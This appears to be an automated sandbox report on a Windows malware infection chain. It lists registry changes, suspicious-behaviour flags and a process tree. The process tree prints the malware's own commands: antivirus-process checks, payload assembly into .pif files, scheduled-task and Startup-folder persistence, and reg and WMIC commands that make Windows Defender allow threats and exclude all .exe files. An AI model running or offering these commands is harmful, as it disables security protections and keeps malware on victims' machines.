| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{ff3ab8f7-0000-0000-0000-d01200000000}\MaxCapacity = "14116" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe
"C:\Users\Admin\AppData\Local\Temp\1bca90670ea01a05472c06449066d4a8ba53619a22b1ab993efe27e7326d0f9d.exe"
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000110001\runtime.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4316,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=4152 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe
"C:\Users\Admin\AppData\Local\Temp\1000129001\DOC.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 40365
C:\Windows\SysWOW64\findstr.exe
findstr /V "HopeBuildersGeniusIslam" Sonic
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
Beijing.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe
"C:\Users\Admin\AppData\Local\Temp\1000131001\PctOccurred.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Powell Powell.cmd & Powell.cmd & exit
C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe
"C:\Users\Admin\AppData\Local\Temp\1000132001\runtime.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k move Continues Continues.cmd & Continues.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 193997
C:\Windows\SysWOW64\findstr.exe
findstr /V "JulieAppMagneticWhenever" Hist
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Medicines + ..\While + ..\Remained + ..\Bs + ..\Ak + ..\Statistical + ..\Entity + ..\Autumn + ..\Scott + ..\Keyboards y
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
Restructuring.pif y
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 40365
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b ..\Mr + ..\Minister + ..\Template + ..\Dietary + ..\Speak + ..\Mobile + ..\Zinc + ..\Continue s
C:\Users\Admin\AppData\Local\Temp\40365\Beijing.pif
Beijing.pif s
C:\Windows\SysWOW64\choice.exe
choice /d y /t 5
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=3052,i,8548254608087149642,10333768245962368401,262144 --variations-seed-version --mojo-platform-channel-handle=2272 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\193997\Restructuring.pif
C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe
"C:\Users\Admin\AppData\Local\Temp\1000137101\1111.exe"
C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe
"C:\Users\Admin\AppData\Local\Temp\1000141101\385133.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC5FB.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe
.\Install.exe /sjJKLdidMdi "385133" /S
C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe
"C:\Users\Admin\AppData\Local\Temp\1000142101\build2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe
"C:\Users\Admin\AppData\Local\Temp\1000147001\nano.exe"
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bPUvzXzfJRZdhTmsKY" /SC once /ST 22:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe\" wc /ydidAPN 385133 /S" /V1 /F
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 752
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 800
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 860
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 912
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 920
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1128
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 2924 -ip 2924
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2924 -s 1124
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSC86C.tmp\Install.exe wc /ydidAPN 385133 /S
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
